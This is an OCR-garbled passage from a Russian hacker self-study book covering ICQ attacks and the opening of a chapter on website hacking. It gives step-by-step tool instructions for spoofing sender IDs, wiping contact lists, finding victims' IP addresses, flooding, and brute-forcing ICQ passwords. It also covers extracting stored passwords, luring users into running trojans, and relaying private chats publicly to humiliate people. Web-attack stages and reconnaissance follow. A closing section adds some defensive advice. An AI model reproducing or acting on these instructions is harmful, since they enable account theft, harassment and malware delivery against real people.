кнопке Send (Отправить). Если надо, в группе элементов управления Setting
(Настройка) в поле Loop (Цикл) введите число посланий, а в соседнем справа
открывающемся списке выберите тип послания. Чтобы скрыть свой UIN, в поле
UIN# введите какое-либо число или щелкните на кнопке Ran (Random — Случай102

Хаки нг ICQ
ный). Таким образом, получатель вашего послания будет искать обидчика по
адресу, которого, возможно, не существует в природе.
Более интересные штучки, чем рассылка такого рода ICQ-бомб, могут состоять в
отправке кому-либо сообщений, в которых UIN отправителя совпадает с UIN
получателя. Если получатель внесет отправителя таких посланий в свой контактный лист, то при следующем запуске клиента ICQ старых версий (ICQ99a
или ICQ99b) контактный лист будет утерян. Такая атака называется DB-киллер
(или еще интереснее — «киляние аськи»), где DB означает Data Base — база данных, поскольку контактный лист хранится в файле базы данных, помещенной в
каталог DB или NewDB. В программе LameToy такую атаку можно выполнить,
выбрав тип послания DB killer (Убийца DB) из открывающегося списка в группе
элементов управления Setting (Настройка). Защита от таких атак заключается в
использовании новых версий клиента ICQ, и автор настоятельно советует сделать эту операцию незамедлительно.
Программ, которые, подобно LameToy, позволяют фальсифицировать UIN отправителя, превеликое множество, например, System Messenger — одна из программ группы ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker
и другие.

Определение lf~ac)peca и порта ICQ-клиента
Упомянутую выше атаку DoS (как и многие другие) можно выполнить, только
зная ГР-адрес компьютера своей жертвы. Чтобы решить такую задачу, существует
множество хакерских утилит, например, популярная утилита Advanced ICQ IP
Sniffer — одна из программ группы ICQ Team (ее можно найти на многих Webсайтах, например, на http://www.icqinfo.ru/sofl_icqteam.shtml).
На Рис. 7.2 представлен диалог утилиты Advanced ICQ IP Sniffer.

a a a’

Advanced ICQ IP Sniffer
Your UIN: [207685174

| Password: IJ

UIN to check: |123456783

Clear list

Cheek

Saver

Timeout. Tiy again.

Ext IP: |

|

Status: |

|TCPFIa9: |

IntIP: |

|

TCP Pott: |0

| TCP Version: |0

Puc. 7.2. Диалог утилиты-снифера IP-адресов клиентов ICQ

103

Самоучитель хакера
Чтобы получить IP-адрес клиента ICQ по его UIN, программа Advanced ICQ IP
Sniffer подсоединяется к серверу ICQ, используя ваш UIN и пароль. Эти данные следует ввести, соответственно, в поля Your UIN (Ваш UIN) и Password
(Пароль) диалога Advanced ICQ IP Sniffer (Усовершенствованный снифер ГР
клиента ICQ). Последующий щелчок на кнопке Check (Извлечь) в строке справа
от кнопки отображает ход процесса подключения, и если настройки клиента ICQ
с указанным UTN не запрещают передачу такой информации, в разделе Info
(Информация) отобразятся результаты проверки.
Как видим, в разделе Info (Информация) диалога на Рис. 7.2 можно узнать как
внешний, так и внутренний (в локальной сети) IP-адрес клиента ICQ, а также
TCP-порт, который клиент ICQ использует для приема и получения информации. Эти данные отображаются, соответственно, в полях Ext IP (Внешний ГР), Int
IP (Внутренний IP) и TCP Port (Порт TCP). Получив столь исчерпывающие данные, можно приступить к атакам посерьезней рассылки фальсифицированных
ICQ-сообщений (чем мы и займемся чуть ниже).
Сервер ICQ, с которым соединяется программа Advanced IP ICQ Sniffer, указан в диалоге
ICQ server’s address and port (Адрес и порт
сервера ICQ), отображаемом при щелчке мышью на кнопке Server (Сервер) и представленном на Рис. 7.3.

ICQ server’s address and port
Address: licq.rnirdbilis.com
Port:

[4000

|

£3

| |

OK

|

|

Cancel

|

Рис. 7.З. Диалог
ICQ server’s address and port
(Адрес и порт сервера ICQ)

По умолчанию в диалоге ICQ server’s address and port (Адрес и порт сервера ICQ)
указан адрес сервера Mirabilis и стандартный порт подключения к серверу ICQ 4000. Вы можете указать и другие серверы, пробуя различные комбинации адрес/порт для выявления IP-адреса сервера и его порта входящих/исходящих сообщений.

Флудеры ICQ, или, как иногда говорят, ICQ-бомберы, подобны описанным в
предыдущей главе мейлбомберам и предназначены для отправки множества
сообщений на порт ICQ-клиента с целью прекращения или затруднения работы клиента ICQ. Толку от таких атак мало, и их используют по большей части
персонажи наподобие доктора Добрянского, получающие удовольствия от
причинения окружающим мелких гадостей. Однако для полноты изложения
опишем, как работает известный флудер ICQ, входящий в пакет ICQ-MultiWar
(http://www.paybackproductions.com/), который так и называется — ICQ Flooder
(Рис. 7.4).

104

Хакинг ICQ
ICQ Flooder
File
Victim’s address: 127.0.0.1

|

ICQ Port [1027

El Randomly generated UIN
Appatenl source UIN: Q
No. ol Messages: |1

[•••

Message:
Eat this!

ICO Flooder 1.2 Copyright (C) 1998 dph-man and Implant Man

Puc. 7.4. Диалог флудера ICQ
Чтобы воспользоваться флудером ICQ Flooder, выполните такие шаги.
> В поле Victim’s address (Адрес жертвы) введите выявленный IP-адрес
клиента ICQ.
> В поле ICQ-port (Порт ICQ) введите номер порта TCP.
> Укажите, какой UIN отправителя следует включать в сообщения. Имеется два
варианта:
• Случайная генерация UTN — установите флажок Randomly generated UIN
(Генерировать случайные UIN), что приведет к использованию в сообщениях случайных UIN отправителей вместо вашего реального UIN.
• Посторонний UIN отправителя — укажите в поле Apparent source UIN
(Отображаемый UIN отправителя) фиктивный UIN, который будет отображаться клиентом ICQ получателя.
>• В поле со счетчиком No. of Messages (Число сообщений) укажите число отсылаемых ICQ-бомб.
> В поле Message (Сообщение) укажите текст сообщения (что-нибудь простенькое, но со вкусом).
> Щелкните на кнопке Send! (Отослать) и в отобразившемся диалоге понаблюдайте за ходом пересылки сообщений.
Опять-таки повторяем, что все эти флудеры ICQ, как и мейлбомберы, — в лучшем случае орудие возмездия зарвавшемуся «кул хацкеру», но, как справедливо
105

Самоучитель хакера
указано автором одной из статей на сайте http://mht.hut.ru/icq/icq.html, это
отнюдь не инструмент серьезного хакинга (с этой страницы, кстати, можно скачать некоторые связанные с ICQ программы, упомянутые в этой главе). Наилучшее применение ICQ — это рассылка троянских коней, которые далее будут
приносить вам плоды, растущие на чужом огороде, — но отнюдь не затаптывать
этот самый огород!

сервера ICQ
Чтобы получить полный контроль над работой ламера с сервисом ICQ, можно
попробовать взломать доступ к серверу ICQ, воспользовавшись методом прямого перебора паролей доступа, аналогичного применяемому для взлома почтовых
ящиков. С точки зрения криптографии такой метод вполне допустим, если у вас
имеются неограниченные вычислительные ресурсы, а система защиты не отслеживает многократные попытки входа с одного адреса.
Для решения задачи брутафорсинга паролей существует множество утилит, например, ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), диалог которой представлен на Рис. 7.5.
OICO SubMachineGun vl.4 by uD
File Settings About
[ Bruteforce ]

About
[… [ 13 Single
[~~] П Single

Agent
Force!

||(c) uD . Moscow 2QO1

Puc. 7.5. Утилита ICQ subMachineGun
готова брутафорситъ U1N клиента ICQ

106

Хакинг ICQ
На английском языке метод прямого перебора называется «brute
force» — грубая сила, поэтому на хакерском сленге так и говорят «брутафорсить пароли», когда речь заходит о взломе паролей
доступа путем тупого перебора всех возможных вариантов. Сам
же процесс взлома паролей методом грубой силы называется
«брутафорсингом ».
Для взлома пароля доступа к серверу ICQ с помощью утилиты ICQ subMachineGun
вначале выполните такие шаги по настройки программы.
>•

Запустите утилиту ICQ subMachineGun.

> Выберите команду меню Settings * Connections&Cracking (Подключение&Взлом). На экране появится диалог, представленный на Рис. 7.6.
icq server

port

[ Cracking ]
13 Stop if successful…
ЕЭ Make log of cracked uins
0 Reconnect if timeout
0 Cut passwds length to 8 digits
set timeout:
relogln ;

times

Cancel

OK

Puc. 7.6. Настройка утилиты взлома U1N
В поле icq server (Сервер ICQ) укажите адрес сервера ICQ, намеченного для
взлома, или оставьте стандартную установку ICQLmirabilis.server.
В поле port (порт) укажите порт подключения к серверу или оставьте стандартное значение 4000.
В группе элементов управления Cracking (Взлом) установите флажки режима
взлома:
• Установка флажка Stop if successful (Остановиться при успехе) останавливает дальнейший перебор паролей после успешной регистрации на
сервере ICQ.
• Установка флажка Make log if cracked uins (Записывать в журнал взломанные UIN) приводит к записи в журнальный файл всех взломанных паролей доступа к серверу ICQ.
107

Самоучитель хакера
• Установка флажка Reconnect if timeout (Восстановить соединение после
простоя) вынуждает утилиту восстанавливать соединение с сервером ICQ
после простоя.
• Установка флажка Cut password length to 8 digits (Ограничить длину пароля
8-ю цифрами) ограничивает длину проверяемых паролей 8-ю цифрами.
>• В поле со счетчиком set timeout (установить время простоя) укажите время ожидания отклика сервера на запрос или оставьте стандартное значение 15 сек.
>• В поле relogin (повторный вход) укажите число попыток входа в сервер ICQ
или оставьте стандартное число 3.
После настройки утилиты ICQ subMachineGun следует выполнить настройку
генераторов взламываемых UIN и тестируемых паролей. С этой целью выполните такие шаги.
> В главном диалоге утилиты ICQ subMachineGun в разделе Bruteforce
(Прямой перебор) установите режим генерации взламываемых UIN. Для этого выберите одну из двух возможностей.
• Установите верхний флажок Single
(Одиночный) для проверки единственного UIN, который следует ввести
в поле слева от флажка.
• Сбросьте нижний флажок Single
(Одиночный) для генерирования UIN.
Если выбран режим генерирования UIN,
щелчком на верхней кнопке с тремя точками (…) отобразите диалог Making victims list (Генерация списка жертв), представленный на Рис. 7.7.
В диалоге Making victims list (Генерация
списка жертв) в поля раздела Range (Диапазон) последовательно, в порядке сверху
вниз, введите нижнюю границу проверяемых UIN (умолчание — 100000) и верхнюю
границу (умолчание 900900).

I Hint: use Del to remove uins from list

Puc. 7.7. Выбор режима генерации
взламываемых UIN

В поле step (шаг) введите шаг приращения

значений UIN (умолчание — 100).
Щелкните на кнопке Generate (Генерировать) и генерируйте UIN; результат
отобразится в левой части диалога.

108

Хакинг ICQ
Если необходимо, можете в поле сверху кнопки Generate (Генерировать) ввести
какой-либо UIN, который вы нашли в контактных листах, в Интернете, и т.д.
Щелчок на кнопке Add (Добавить) добавит указанный UIN к списку слева.
>• Если у вас имеется текстовый файл со списком UIN, откройте его с помощью
кнопки Open (Открыть) и пополните список проверяемых UIN (в файле каждый UIN помещается в отдельную строку).
> Чтобы удалить какой-либо UIN из списка, щелкните на нем в отображаемом
списке и нажмите на клавишу t0*»!. Кнопка Clear (Очистить) позволяет очистить список проверяемых UIN (это позволяет начать все заново).
Завершив создание списка UIN, щелкните на кнопке ОК.
Теперь настроим список тестируемых паролей.
> В главном диалоге утилиты ICQ subMachineGun в группе элементов управления Bruteforce (Грубая сила) установите режим генерации тестируемых
паролей. Для этого выберите одну из двух возможностей.
• Установите верхний флажок Single (Одиночный) для проверки единственного пароля, который следует ввести в поле слева от флажка.
• Сбросьте нижний флажок Single (Одиночный) для генерирования паролей.
>• Если выбран режим генерирования паролей, то
щелчком мыши на верхней кнопке с тремя точками (…) отобразите диалог Make passlist
(Создать список паролей), представленный на
Рис. 7.8.
В диалоге Make passlist (Создать список паролей)
для генерирования списка паролей имеется две
возможности.
> Щелкните на кнопке Open (Открыть) и выберите текстовый файл со списком паролей (каждый
пароль в отдельной строке). Это наилучшая
возможность взлома — используя файл со списком наиболее часто используемых паролей,
можно попытаться с помощью нескольких сотен попыток найти пароль неопытного пользователя ICQ.

Use Del to remove passwords from list

Puc. 7.8. Диалог
генерирования паролей

v Введите свой пароль в поле над кнопкой Generator (Генератор) и щелкните
на кнопке Add (Добавить). Последовательно повторяя эту процедуру, пополните список паролей.
109

Самоучитель хакера
> Чтобы удалить какой либо пароль из списка, щелкните на нем в отображае0
мом списке и нажмите на клавишу К *»**]. Кнопка Clear (Очистить) позволяет
очистить список проверяемых паролей (чтобы начать все заново).
>• Завершив создание списка паролей, щелкните на кнопке ОК.
Теперь все готово для взлома. Подсоединяемся к Интернету и щелкаем на
кнопке Force (Ломать). Если вам повезет, то в нижней части диалога ICQ
subMachineGun v1.4 отобразится взломанный пароль (Рис. 7.9).
OICQ SubMachineGun vl 4 by uD
File Settings About

[ Bruteforce ]

About

[Г] 0 Single
[~~] D Single

Agent

Puc. 7.9. Пароль взломан — для конфиденциальности
он отображен несколько размытым
Чтобы продемонстрировать вам работу утилиты ICQ subMachineGun v1.4, автор
попросту использовал свой UIN, добавив к списку стандартных паролей собственный пароль (исходя из соображений конфиденциальности, этот пароль отображен на Рис. 7.9 заретушированным). Как видим, взлом выполнен с помощью
трех попыток на каждый пароль, и каждая попытка заняла 15 сек, потраченных
на ожидание отклика сервера ICQ. Так что теперь вы можете реально оценить
свои возможности — 45 сек на каждый пароль означают несколько часов непрерывного брутафорсинга паролей в онлайновом режиме, если список паролей
имеет приемлемую длину (не более нескольких сотен паролей). В принципе,
учитывая наличие в Интернете большого числа неопытных пользователей с паролями, составленными из имен людей, домашних животных, названий автомобилей, имен популярных артистов и т.д. — шансы у настойчивого хакера неплохие.
Было бы за что бороться…
110

Хакинг ICQ

(ССНкрякеры
И все-таки, что там ни говори, брутафорсинг сервера ICQ — вещь достаточно
трудоемкая. Если пользователь сервиса ICQ не поленится ввести пароль достаточной длины и сложности, то удаленный взлом сервера ICQ простым перебором паролей становится практически невозможным. Так что же, сдаться и
признать свое бессилие? Не тут-то было! Если вам не удается лобовая атака,
почему бы не поискать обходные пути? Например, можно отослать своему
ICQ-собеседнику исполняемый файл и попробовать убедить его, что это самораспаковывающийся архивный файл с фотографией его собачки. Клюнувший на
эту приманку ламер вместо фотографии собачки обзаведется на своем компьютере троянским конем, да еще и снабженным средствами удаленного управления
компьютером.
Что же может последовать за таким событием? Хакер приобретает возможность исследовать компьютер ламера так, как будто сидит за его консолью и
исследует файловую систему хакнутого компьютера проводником Windows.
Теперь хакер может применить весь инструментарий для взлома локального
компьютера, о котором мы говорили ранее в этой книге. В частности, можно
извлечь пароли доступа к сервису ICQ из локальных файлов, хранящихся в
папке с установленной программой клиента ICQ. Для такого рода процедуры
имеется множество программ ICQ-крякеров, например, очень интересная
программа фирмы ElcomSoft под названием Advanced ICQ Password Recovery
(http://www.elcomsoft.com).
Работа с этой программой легка и приятна, поскольку делать ничего не надо.
На Рис. 7.10 представлено рабочее окно программы Advanced ICQ Password
Recovery.

31.01.2003 Ш 2:05 — ACQPR1.0 launched, registered version

6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L

Puc. 7.10. Рабочее окно утилиты извлечения паролей ICQ из файлов .dat
Чтобы взломать пароль клиента ICQ, щелкните на значке папки в левой верхней части диалога Advanced ICQ Password Recovery (Усовершенствованное
восстановление паролей ICQ) и в стандартном диалоге открытия файла найдите файл .dat, хранящий пароли клиента ICQ.
111

Самоучитель хакера
У разных клиентов этот файл хранится в
разных папках, например, у клиента ICQ
2002а эта папка называется 2002а. Папка
2002а хранит файл с именем, составленным из номера UIN и расширения .dat,
т.е., в данном случае, 207685174.dat
(207685174 — это UIN автора). Выбор этого файла приводит к появлению диалога
ICQ Password successfully found! (Пароль ICQ успешно найден), отображающего восстановленный пароль (Рис. 7.11).

ICQ Password successfully found !
ICQ version:
99b-2000b
UIN password:

% Copy to Clipboard

fij Close

Puc. 7.11. Пароль успешно
восстановлен!

Хотя диалог на Рис. 7.11сообщает, что эта версия программы предназначена для
работы с клиентами ICQ версий 99b — 2000b, она успешно справилась с клиентом ICQ 2002а (пароль заретуширован из соображений конфиденциальности).
Так что задача хакера, желающего взломать сервис ICQ попавшегося под руку
ламера, весьма проста — нужно добраться до его компьютера либо локально, либо удаленно — и применить ICQ-крякер. Возможностей тут множество — локальный доступ к компьютеру, загрузка троянов, отправка почты с активным вложением (см. [11]), атака на Web-клиента (см. Главу 8). Все это очень интересно, но
тут есть и универсальный метод, называемый социальной инженерией, так что
обсудим и эту тему.

Методы социальной инженерии
Как везде и всюду, наиболее эффективным инструментом хакинга сервиса ICQ
(и не только) является социальная инженерия, попросту мошенничество. Конечно, при наличии достаточно больших вычислительных ресурсов, быстрой линии
связи и хорошей программы брутафорсинга паролей, можно пойти в лобовую
атаку на сервер ICQ. В этом случае, рано или поздно, но вы можете получить
пароль доступа к сервису ICQ какого-либо ламера, забывшего основной принцип
компьютерной безопасности — использование сложных паролей и их частую замену. Однако такую задачу можно решить и иным, более эффективным путем.
Когда вы настраиваете свой клиент ICQ, от вас требуется ввести свой почтовый
адрес. Некоторые пользователи считают эту процедуру пустяковой и указывают
вместо реально существующего адреса электронной почты вымышленный адрес. Так вот, учтите, что если хакер при обследовании списка ICQ-клиентов найдет такой вымышленный почтовый адрес — взлом доступа к сервису ICQ владельца этого адреса не вызывает никаких проблем. Дело в том, что именно на
указанный при регистрации адрес электронной почты сервер ICQ высылает пароль, если обладатель UIN воспользуется средствами сервера для восстановления пароля регистрации на сервере. А теперь подумайте — что помешает хакеру
112

Хакинг ICQ
создать почтовый ящик с таким вымышленным почтовым адресом и запросить
сервер об отправке ему якобы забытого пароля?
Так что вы, наверное, поняли, в чем состоит суть социальной инженерии — выведывание всеми методами у своей жертвы любой информации, помогающей
взломать доступ к информационным ресурсам компьютера. Привычки, пристрастия, поведение жертвы — все имеет значение, поскольку, к примеру, зная, что
вы любите животных, можно предположить, что при выборе пароля вы используете имя своей собачки — а ведь список имен для животных отнюдь не бесконечен. Поскольку ICQ — это способ непосредственного, живого общения, человек,
обладающий элементарными навыками в психологии, может так «заговорить»
своего собеседника, что он согласится принять от него исполняемый файл, разболтает все, что знает и не знает, после чего этому ламеру останется только подсчитывать убытки.
Другой аспект социального мошенничества — это устройство «заподлянки»,
т.е. такой такой ловушки для пользователя ICQ, после которой ему, возможно,
придется менять свой образ жизни. Например, можно отослать двум клиентам
ICQ приглашение на беседу и запустить у себя на компьютере программу ICQ,
позволяющую работать одновременно с двумя клиентами ICQ (для такого рода
манипуляции имеется даже программа, входящая в пакет ICQ Team
(http://www.lcqteam.com)). Далее беседа с одним ICQ-собеседником ведется через первый клиент ICQ, а с другим ICQ-собеседником — через второй клиент ICQ.
Содержание беседы немедленно публикуется на общедоступном чате на потеху
окружающим — мало ли что там может быть сказано, побывайте на наших чатах.
Правда, неплохо придумано? Как говорила героиня популярной комедии,
«скромненько, но со вкусом». А что, если эти «собеседники» будут обсуждать
что-то очень интимное, а в контактных листах указаны их настоящие идентификационные данные? А что, если все это потом… Ну да ладно, умные люди уже
все поняли, а всем прочим понять простые вещи удается только после некоторых приключений, и то не всегда.
Так что будучи в Интернете и общаясь в кругу ICQ-собеседников, помните — вы
находитесь в зоне повышенного внимания со стороны всяких разных докторов
Добрянских и им подобных персонажей, вполне способных учинить большие
неприятности.

Заключение
Сервис ICQ играет для хакинга весьма большое значение, однако не все хакеры правильно понимают открывающиеся перед ними возможности. Основное предназначение ICQ для серьезного хакера — это сбор полезной информации о своих жертвах,
а также распространение троянских коней и прочих хакерских инструментов

113

Самоучитель хакера
по компьютерам ICQ-собеседников. А вот бомбардировка первых попавшихся
клиентов ICQ бессмысленными посланиями и проделывание с ними всяких штучек типа атак DoS или разрушения чатов… Все подобные действия не имеют
никакой рациональной подоплеки и должны быть морально осуждены.
Для антихакера описанные в этой главе методы хакинга ICQ интересны по двум
причинам. Во-первых, антихакеру следует знать о наличие таких возможностей,
как ICQ-флудинг, ICQ-спуфинг, ICQ-крякинг и тому подобного. Назначая пароли
для регистрации на серверах ICQ, всегда следует помнить о возможности взлома
простого пароля с последующей фальсификацией сообщений или разрушения
доступа к сервису ICQ. А выяснивший ваш IP-адрес хакер запросто может предпринять сетевую атаку, когда вы будете общаться с ним по прямому доступу,
минуя сервер ICQ. О возможностях социального мошенничества по дискредитации пользователя ICQ уж и говорить не хочется.
Так что перед тем, как вы войдете в ICQ-сообщество, предпримите меры защиты отмените все неавторизованные включения вашего UTN в контактные листы и
ни в коем случае не указывайте в идентификационных данных реальные сведения о себе самом. Далее, общаясь с ICQ-собеседником, всегда запускайте программу-брандмауэр, например, BlacklCE Defender, чтобы избежать возможной
атаки DoS. И самое главное — никогда не принимайте от неизвестных людей
файлы, особенно исполняемые, под каким бы предлогом вам их ни навязывали.
В крайнем случае, проверяйте полученные файлы на наличие вирусов и перед
использованием запускайте на тестовых компьютерах. Помните, что столбовая
дорога троянских коней в ваш компьютер лежит через клиент ICQ — для хакера
это наилучший способ втереться в доверие к тупому ламеру и заставить его запустить на компьютере хакерскую программу.
Во-вторых, антихакеру неплохо бы перенять кое-какие инструменты хакинга
ICQ, чтобы противостоять атакам из Интернета на своего клиента ICQ. Например, зная IP-адрес своего ICQ-собеседника, можно контролировать его действия
по полной программе — вплоть до открытого предупреждения о своих возможностях. Это действует весьма отрезвляюще на господ типа доктора Добрянского,
не говоря уж о прочих достоинствах такой активной обороны.
Наконец, последний совет. Если вам очень потребуется использовать ICQ для секретных переговоров, можете воспользоваться программой PGP Desktop Security 2.9,
которая предоставляет средства шифрования передаваемых ICQ-сообщений
открытыми ключами собеседников. Это весьма удобное средство, достаточно
эффективно защищающее переговоры при условии использования подписанных
открытых PGP-ключей (подробнее об этом можно прочитать в [7]).

114

Г Л А В А 8.

Хакинг Web-caumoft
Что же хакер может извлечь из Web? В начале книги мы уже писали, что Web
служит для хакера одним из основных источников информации, необходимой
для успешного выполнения атаки на компьютерные системы. На Web-страничках
хакер может найти телефоны организации, адреса электронной почты сотрудников организации и адреса Web-сайтов филиалов организации и ее партнеров.
Все это весьма ценная вещь, требуемая для выполнения атак на почтовые клиенты, для сканирования телефонов организации с целью удаленного взлома доступа к корпоративной сети, или других задач.
Далее, очень часто хранящаяся на Web-серверах информация содержит много
такого, что не связано напрямую с предоставлением информации посетителям, а
оставшееся, например, вследствие недосмотра разработчиков сайта. Очень часто
в комментариях внутри кода HTML Web-страничек можно найти указания на
фамилии разработчиков (а это — логин для попыток входной регистрации), их
телефоны, адреса электронной почты. Ссылки в коде HTML на ресурсы сайта
содержат сведения о структуре каталогов сервера. Применяемые для работы
сайта сценарии также не лишены недостатков и подчас позволяют проникать на
серверный компьютер за счет элементарных ошибок программирования (на этом
основаны описываемые далее атаки переполнения буфера).
Программное обеспечение, применяемое на Web-сайтах, в частности, Web-серверы,
содержит большое число уязвимостей, и выявивший их хакер может с их помощью взломать доступ к сайту. Далее хакер превратит сервер HTTP, обслуживающий сайт, в ворота для проникновения из Интернета в локальную сеть организации, содержащую лакомые информационные ресурсы. Успеху такой атаки
весьма способствует плохая настройка системы защиты Web-сервера, наличие
открытых для записи каталогов, слабые пароли доступа и так далее.
Наконец, отчаявшись взломать Web-сайт, хакер может выполнить атаку DoS и
попросту «завалить» работу компьютерной системы сайта, что неоднократно
происходило даже с такими мощными системами, как сайт Yahoo. Такие атаки
мы опишем в следующей главе, а в этой главе займемся более созидательными и
полезными задачами хакинга Web-серверов, нежели такое достаточно бессмысленное занятие, как отправка (за свой счет) на Web-сервер пакетов, затрудняющих
работу серверного компьютера. Вначале сделаем экскурс в вопросы функционирования сайта Web и выявим задачи, которые должен решить хакер для его взлома.

Функционирование Web~cauma
Функционирование сети Web можно представить себе как обмен информацией
между пользователем Web или, как говорят, клиентом Web, и ресурсом Web,

Самоучитель хакера
причем на пути этого обмена находится многоуровневая
аппаратная система, которая выполняет следующие функции.

программно-

На компьютерах пользователей Web работают программы-клиенты Web, которые обеспечивают пользовательский интерфейс и обмен информацией с сервером Web через сеть Интернет. Сервер Web — это служба, исполняемая на сетевом компьютере и обеспечивающая прием запросов пользователя с последующей передачей запроса приложениям Web, которые обрабатывают запрос и передают ответ серверу Web для пересылки запрошенной информации пользователю. Приложения Web для обработки запросов чаще всего обращаются к базам
данных, используя для этого специальные механизмы подключения к базам данных и поиска в них нужной информации.
В качестве клиентов Web чаще всего используются программы-браузеры Web,
например, Internet Explorer (ffi), работающие на основе двух средств — языка
HTML разработки Web-страниц, и протокола HTTP, регламентирующего обмен
информацией между сервером и клиентом Web.
В качестве серверов Web используется множество программных средств от различных производителей, включая информационный сервер Интернета IIS от фирмы Microsoft, сервер Apache HTTP Server от фирмы Apache Software Foundation и
другие. Эти серверы передают запросы приложениям Web, созданным на основе
технологии ASP (Active Server Page — активные страницы сервера) протокола CGI,
регламентирующего вызовы сценариев сервера, сервлетов Java фирмы SUN, языка
РНР фирмы Apache Software Foundation и многих других.
Приложения Web, получив запрос от сервера Web, чаще всего обращаются к
базам данных, чтобы извлечь нужную информацию. В качестве этих баз данных используются базы SQL фирмы Microsoft, Oracle фирмы Oracle и так далее.
А чтобы подсоединиться к базам данных, передать им запрос и обменяться информацией, в общем, выполнить функции управления базами данных — чаще
всего используются протоколы ODBC (Open Data Base Connectivity — Открытый
интерфейс доступа к базам данных).
И вот перед хакером встает задача — взломать всю эту махину программ, протоколов, сценариев, языков, баз данных, операционных систем… Что же он должен для этого сделать?

Этапы хзк1штз Web~cauma
Исходя из такой многоуровневой структуры средств, обеспечивающих работу с
ресурсами Web-сайта, хакеру приходится потрудиться для прорыва к нужному
ему информационному ресурсу. Как правило, от хакера потребуется выполнение
следующих задач.

116

Хакинг Web-сайтов
• Исследовать структуру Web-сайта — определить, какие компоненты входят в
средства, обеспечивающие работу сайта, в том числе какие клиенты, протоколы, серверы и приложения Web используются сайтом.
• Взломать Web-сервер — поскольку Web-сервер всегда подключен к Интернету,
как правило, через TCP-порт 80, а программы, реализующие Web-серверы,
изобилуют уязвимостями (про которые регулярно оповещают всех желающих базы данных CVE, и даже ленты новостей многих Web-сайтов), то удаленный взлом Web-серверов — это отнюдь не фантастика.
• Исследовать приложение Web — какие механизмы задействованы для обработки запросов — ASP, скриптлеты Java, CGI и так далее — без этого ничего
сделать не удастся, сами понимаете.
• Взломать систему защиты приложения Web — это означает, во-первых, взлом
механизма аутентификации, а во-вторых, механизма авторизации пользователя (и обойти систему аудита!). Задача аутентификации состоит в подборе
пароля, скажем, методом словарной атаки или методом грубой силы — простым перебором всех вариантов пароля. Задача авторизации решается многими путями, например, подменой файла куки (cookie), идентифицирующего
пользователя, если для авторизации использован механизм файлов куки.
• Выполнить атаку вводом данных — хакер должен попытаться взломать защиту приложения путем передачи Web-приложению специально подобранных
данных, воспользовавшись уязвимостями приложения, вызванными ошибками программирования. Наличие таких уязвимостей позволит, например, передать CGI-сценарию исполняемый код вместо числового параметра, — и если
этот CGI-сценарий не проверяет входные параметры, то, исполнив переданный хакерский код, сервер открывает к себе доступ.
• Исследовать интерфейс с базой данных — именно базы данных хранят нужную хакеру информацию, так что хакер должен изучить способ подключения
Web-приложения к базе данных, чтобы попытаться им воспользоваться.
• Взломать защиту интерфейса управления сайтом — как правило, Web-сайты
снабжены средствами удаленного управления, так что ,у них всегда имеется
открытый порт для удаленного управления, и его поиск и взлом — весьма
эффективный метод хакинга.
• Взломать сайт с помощью клиента — например, подменив серверный сценарий, можно собирать информацию обо всех посетителях сайта, а если этот
сценарий внедрить в содержимое Web-странички, можно выполнять успешный хакинг Web-клиентов, который мы обсуждали в предыдущей главе.
Ясно, что описание всех этих средств заняло бы целую книгу (например, см. [И]).
Мы, однако, ограничимся только некоторыми, наиболее популярными методами взлома сайтов, реализованных с помощью сервера IIS 5. Мы опишем, как
117

Самоучитель хакера
можно получить доступ к файловой системе серверного компьютера (раздел
«Хакинг HTTP»), найти уязвимые CGI-сценарии сервера (раздел «Уязвимые
сценарии») и получить доступ к запароленной страничке Web взломом пароля
доступа методом грубой силы (раздел «Взлом доступа к страничкам Web»).
В конце главы мы опишем методы загрузки на жесткий диск компьютера целого
Web-сайта и объясним, что из этого можно извлечь для пользы дела.
Сервер IIS избран по той причине, что это наиболее популярный Web-сервер,
ставший поэтому излюбленной мишенью для хакеров. Антихакер должен отчетливо понимать, что взлом Web-сайта представляет собой значительную угрозу,
поскольку взломанный сервер — это ворота в сеть организации, и проникнувшему в серверный компьютер хакеру открываются большие возможности. Хакер
сможет изменять содержимое сайта — а это прямая угроза фальсификации и дискредитации всей организации, которой принадлежит взломанный Web-сайт. Хакер сможет перехватывать почту — а это угроза конфиденциальности информации или ее фальсификации. Далее, подменяя загружаемые по FTP-доступу файлы, хакер сможет распространять вирусы, трояны и прочие хакерские утилиты.
Так что методы хакинга сайтов должны быть досконально известны антихакеру более того, именно с их учетом следует выполнять тестирование системы защиты сайта на предмет ее устойчивости к атакам.
Рассмотрим перечисленные выше задачи хакинга Web-сайтов по порядку.

Исследование Web~cauma
Никакой серьезный взломщик компьютерной информационной системы, в том
числе Web-сайта, не приступит к атаке без тщательного изучения применяемых
в системе компьютерных технологий. Взломщика будет интересовать архитектура сети, используемые операционные системы, общие ресурсы сети, учетные
записи пользователей этих ресурсов, типы сетевых серверов. Для получения такого рода сведений хакеры, как правило, выполняют следующие действия.
• Предварительный сбор данных, заключающийся в систематизированном сборе открытых сведений о Web-сайте конкретной организации, включая диапазон ГР-адресов сети, подсоединенной к Интернету, сведения о DNS-серверах,
зарегистрированных доменных именах и администраторах сети.
• Сканирование сети организации с целью выявления сервера Web.
• Инвентаризацию открытых портов, запущенных служб и типа операционной
системы серверного компьютера.

118

Хакинг Web-сайтов

Предварительный c£bp данных
Во время предварительного сбора данных о намеченном для атаки Web-сайте
хакер может и должен обратиться к ресурсам Интернета. Эти ресурсы включают
следующее.
• Во-первых, хакер может обратиться к сведениям, хранимым в базах данных
организаций — поставщиков услуг Интернета, обязанных регистрировать
подключаемые к Интернету серверы и сети. Эти данные содержат выделяемые IP-адреса, фамилии, телефоны и адреса администраторов сети, доменные
имена и прочую весьма полезную информацию. В разделе «Базы данных
Whols» мы укажем источники этих сведений.
• Во-вторых, следует самым внимательным образом изучить HTML-код страниц Web-сайта атакуемой организации. Код HTML может содержать комментарии, не отображаемые браузерами Web, но содержащие весьма интересные сведения, вносимые разработчиками страниц для справочных целей.
К примеру, в комментариях могут содержаться контактные телефоны, структура каталогов сервера, адреса электронной почты разработчика, коды сценариев JavaScript и многое другое. Все это весьма ценные сведения для выполнения атаки, и методы извлечения HTML-кода сайта Web описаны в разделе
«Web-спайдер Teleport Pro».
Начать, конечно, следует с регистрационной базы данных Whols — там содержатся первичные, самые важные сведения о локальной сети, поддерживающей
подсоединенный к Интернету сервер Web. Для извлечения этих данных можно
прибегнуть к утилите командной строки whois (традиционного средства системы
